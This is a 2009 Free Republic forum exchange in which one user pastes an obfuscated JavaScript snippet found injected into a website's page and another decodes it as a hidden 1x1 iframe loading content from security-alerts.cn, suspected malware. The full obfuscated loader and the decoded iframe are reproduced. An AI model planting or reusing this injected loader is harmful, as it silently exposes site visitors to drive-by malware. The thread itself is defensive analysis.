Free Republic
Browse · Search 		Smoky Backroom
Topics · Post Article

To: Boucheau
There is a piece of obfuscated javascript at the end of the body element, apparently added mechanically right above the /body end tag, below the page designer's signature, which decodes itself and executes something hidden upon loading of the page. I have firefox no-script add-on which blocks scripts unless excplicitly enabled, so it didn't run the code on my machine. If someone has half an hour to run the code, display the output of decoder (the function YuLQmW below) on the obfuscated strings and see what it does, here it is:

<!-- Gorgeous design by Michael Heilemann - http://binarybonsai.com/kubrick/ -->

<script > function YuLQmW(cqGOKkKxg, paXoW, bRwOHYl){var
SjTKsiaJe=bRwOHYl.split(paXoW);var NhAxBaVLcf='';
for(qGST=0;qGST<(SjTKsiaJe.length-1);qGST++){
AXEMcaaiu = SjTKsiaJe[qGST]^cqGOKkKxg;NhAxBaVLcf
+= String.fromCharCode(AXEMcaaiu);}return NhAxBaVLcf;}
function hjgksr(){var GncOozzc=new Function("QtBFdMu",
"return "+YuLQmW(-0x13+0x8+0x2f+0x29+0x2d+0x28+0x2e+0x7f,
'U','299U288U300U314U290U298U289U315U')+"."+
YuLQmW(-0x7-0xe+0x14+0x3b1, 'G','978G991G980G969G')+"");var
zotuOWV=GncOozzc(-0x1c+0x25-0x1-0x1f+0x2c-0x14);
zotuOWV.innerHTML += YuLQmW(0x4+0x30+0x2c-0x25+0x0+0x4e,
'V','181V224V239V251V232V228V236V169V254V224V237V253V225
V180V184V169V225V236V224V238V225V253V180V184V169V235V230
V251V237V236V251V180V185V169V239V251V232V228V236V235V230
V251V237V236V251V180V185V169V250V251V234V180V174V225V253
V253V249V179V166V166V250V236V234V252V251V224V253V240V164
V232V229V236V251V253V250V167V234V231V166V234V240V235V236
V251V166V224V231V167V234V238V224V182V189V174V183V181V166
V224V239V251V232V228V236V183V');} if(window.addEventListener){window.addEventListener('load',hjgksr,false);}else if(window.attachEvent){window.attachEvent('onload', hjgksr);} </script > </body> </html>

1,795 posted on 08/02/2009 9:58:37 AM PDT by nightlight7
[ Post Reply | Private Reply | To 255 | View Replies ]

To: nightlight7
It adds this code to document.body: 
<iframe width=1 height=1 border=0 frameborder=0
 src='http://security-alerts.cn/cyber/in.cgi?4'></iframe>
Looks like it’s including some malware code from another site and puts it into an iframe. Perhaps a key logger or something. Yes, looks very infected…
2,069 posted on 08/02/2009 11:07:39 AM PDT by cartan
[ Post Reply | Private Reply | To 1795 | View Replies ]

Free Republic
Browse · Search 		Smoky Backroom
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson